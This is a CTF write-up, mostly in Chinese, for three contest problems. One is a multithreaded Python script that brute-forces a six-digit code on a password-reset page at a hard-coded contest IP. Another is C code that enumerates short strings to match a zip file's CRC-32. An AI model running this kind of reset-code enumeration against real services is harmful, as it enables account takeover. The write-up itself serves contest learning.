hduisa_ctf_week5_writeup

Problem ID:17

EasyUser

一看就是一个爆破验证码的题目,然后就开始写脚本

import urllib    
import urllib2
import re
import threading

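def run(x, y):
    """Submit every candidate code in ``range(x, y)`` to the challenge's forget.php.

    Each candidate is POSTed as the ``number`` form field.  A response body
    containing the substring ``10`` is treated as a rejected guess (presumably
    part of the page's failure message -- confirm against the live page); any
    other body is reported as the accepted code and the shared ``flag`` is set
    so that the other worker threads stop.

    The enumeration is only feasible because the endpoint, as exercised here,
    accepts an unbounded number of guesses for a six-digit numeric code; an
    attempt limit, code expiry or lockout on the reset flow would defeat it.

    Written for Python 2 (``urllib2``).  Returns 0 when it stops because
    another thread already found the code, otherwise ``None``.
    """
    global flag
    url = 'http://104.236.171.163/week5/easyuser/forget.php'
    for i in range(x, y):
        # Re-check the stop flag on every iteration.  The original tested it
        # once before the loop, so threads that were already running kept
        # sending requests after another thread had found the code.
        if flag == 1:
            return 0
        data = urllib.urlencode({'number': i})
        response = urllib2.urlopen(urllib2.Request(url, data))
        try:
            html = response.read()
        finally:
            # Release the connection even if the read fails.
            response.close()
        # Same test as re.match(r'.*10.*', html, re.S): "10" anywhere in the body.
        if '10' in html:
            print('%d is not psd' % i)
        else:
            print('%d is the psd' % i)
            flag = 1
            break
    # NOTE(review): the page lost its indentation; this line is assumed to run
    # once after the loop rather than on every iteration -- confirm.
    print("current has %d threads" % (threading.activeCount() - 1))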

# Shared stop flag: run() reads it and sets it to 1 once a code is accepted.
flag = 0

# Cover 500000..999999 in five equal slices, one worker thread per slice.
workers = [
    threading.Thread(target=run, args=(start, start + 100000))
    for start in range(500000, 1000000, 100000)
]
# Create every thread first, then start them all.
for worker in workers:
    worker.start()
# for i in range(5):
# t3 = threading.Thread(target = run, args=(500000,600000))
# t3.start()

Problem ID:18

听说你们想玩其他类型的题目?

这是之前 bkpctf 一道题的弱化版,叫做 punch。明天有空可以把那道题写一下贴出来;就这道题而言,直接查表就好了。可以看下这个虚拟的打印机。

Problem ID:19

上面那个太简单了

这次给了一个压缩包,可以看见很短的长度和crc,所以可能是通过爆破来解题,查了一下资料,写了个脚本开始爆破。

#include <windows.h>
#include <stdio.h>
// crc32.h -- the include guard below looks like a header pasted inline into this single-file listing.
#ifndef _CRC32_H
#define _CRC32_H

// Returns the CRC-32 of the first len bytes of buf (defined further down).
UINT crc32( UCHAR *buf, int len);

#endif

// 256-entry lookup table, one entry per byte value; filled by init_table().
static UINT CRC32[256];
// Set to 1 by crc32() once the table has been built, so it is built only once.
static char init = 0;

/*
 * Fill CRC32[] with the byte-wise lookup table for the reflected CRC-32
 * polynomial 0xEDB88320: entry i is the result of pushing byte value i
 * through eight shift/xor steps.
 */
static void init_table()
{
    int byte, bit;

    for (byte = 0; byte < 256; byte++)
    {
        UINT value = byte;

        for (bit = 0; bit < 8; bit++)
        {
            /* A set low bit means the polynomial is folded in after the shift. */
            value = (value & 1) ? ((value >> 1) ^ 0xEDB88320) : (value >> 1);
        }
        CRC32[byte] = value;
    }
}

/*
 * crc32: table-driven CRC-32 over the first len bytes of buf.
 * Starts from 0xFFFFFFFF and returns the bitwise complement of the final
 * register.  The lookup table is built on the first call.
 */
UINT crc32( UCHAR *buf, int len)
{
    UINT acc = 0xFFFFFFFF;
    int pos = 0;

    /* Lazy one-time table construction. */
    if (init == 0)
    {
        init_table();
        init = 1;
    }

    while (pos < len)
    {
        /* Low byte of the register xor the input byte selects the table entry. */
        acc = (acc >> 8) ^ CRC32[(acc ^ buf[pos]) & 0xFF];
        pos++;
    }

    return ~acc;
}

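/*
 * Enumerate every 5-character string over the alphabet below and print each
 * one whose CRC-32 equals the target value 0xF30BDD6C.
 *
 * The search deliberately does not stop at the first hit: CRC-32 is only
 * 32 bits wide and not collision-resistant, so more than one string in this
 * space can produce the same value, and every candidate has to be listed.
 *
 * Changes from the original listing:
 *  - the alphabet length is taken once from sizeof instead of calling
 *    strlen() in every loop condition (the listing never includes <string.h>);
 *  - the CRC is kept in a UINT, matching crc32()'s return type, instead of a
 *    signed int compared against an unsigned constant;
 *  - each position of the guess is written in the loop that owns it rather
 *    than all five being rewritten in the innermost loop.
 */
int main()
{
    static const char alphabet[] = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! ";
    const int count = (int)(sizeof(alphabet) - 1);   /* exclude the trailing NUL */
    const UINT target = 0xF30BDD6C;
    char guess[6] = {0};                             /* 5 characters + NUL for printf */
    int a, b, c, d, e;

    for (a = 0; a < count; a++)
    {
        guess[0] = alphabet[a];
        for (b = 0; b < count; b++)
        {
            guess[1] = alphabet[b];
            for (c = 0; c < count; c++)
            {
                guess[2] = alphabet[c];
                for (d = 0; d < count; d++)
                {
                    guess[3] = alphabet[d];
                    for (e = 0; e < count; e++)
                    {
                        guess[4] = alphabet[e];

                        if (crc32((UCHAR *)guess, 5) == target)
                        {
                            /* Keep going after a match; see the note on collisions above. */
                            printf("%s\n", guess);
                        }
                    }
                }
            }
        }
    }

    return 0;
}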

这里还有个坑:第二部分发生了 hash 碰撞,有两个字符串的 crc 是一样的,一个是 IYF35,一个是 9e76e。一开始为了节省时间,读到第一个符合的 crc 之后就停止了,导致提交一直不对;后来把整个范围跑全,拿到了第二个,提交,对了。